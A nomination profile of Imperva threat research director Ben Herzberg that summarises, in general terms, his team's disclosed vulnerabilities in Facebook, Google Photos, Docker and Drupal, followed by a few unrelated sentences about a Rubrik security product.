Ben Herzberg Director of Threat Research Imperva Why Nominated: Under Ben Herzberg’s leadership, Imperva’s threat research team has uncovered key vulnerabilities in
Facebook, Google Photos, Drupal and other online services and platforms.Profile: Herzberg and his Imperva
research team are charged with identifying and evaluating software flaws that
undermine application and data security. In November 2018, Imperva disclosed a
significant Facebook vulnerability that could have allowed hackers to extract
private information about users and their contacts – including their likes,
location and interests – by manipulating the graph search
function to craft malicious search queries.This tactic works
because it abuses the unique cross-origin behavior of iframes, which at the
time of discovery represented an entirely new attack vector. Then, in March
2019, Herzberg and company found that the same attack technique could also be
leveraged to find out exactly who people were conversing with on Facebook
Messenger. Facebook ultimately fixed both vulnerabilities.
Under Herzberg,
Imperva also pinpointed a vulnerability in Google
Photos that allowed hackers to track users’ locations,
via side-channel attacks. Essentially, the service’s search endpoint was
vulnerable to browser-based timing attacks that could be used to determine
where, when and with whom a targeted individual’s photos were taken. Google
fixed this flaw as well.Other vulnerabilities found under Herzberg’s watch include one in the Docker API that attackers had exploited as a zero-day to mine cryptocurrency for financial benefit, a DoS bug in Scapy, an exploited Drupal RCE bug, and DirtyCOW and Drupalgeddon2 vulnerabilities combined with system misconfigurations that leave Drupal web servers vulnerable. The Imperva research team also recently published its “State of Web Application Vulnerabilities” report, which found that web application flaws increased in frequency by 21 percent in 2018 (compared to 2017).What colleagues say: “Ben is a tremendous threat researcher, leader and colleague who excels at every task he tackles. Not only does he have impressive problem-solving skills and technical skills, including hacking and programming, but he also has excellent interpersonal skills that make him a very strong people leader... When there is a complex problem that people "break" their heads to solve, Ben can somehow think differently and find a solution that no one thought of. This outside-the-box mindset combined with his unique range of skills allows him to regularly identify critical new vulnerabilities in some of the world’s leading platforms." - – Unattributed testimonial
The product, which is now in beta for Rubrik Enterprise Edition and cloud customers, aims to address challenges associated with prolonged business outages during cyberattacks, reducing the traditional recovery timeline from days or weeks to moments.
The announcements focused on integrating core security functions like detection, investigation, and response with advanced risk management for business-critical applications and data.
The new features enable rapid threat detection, investigation, and resolution, helping organizations restore operations more quickly, according to the company.
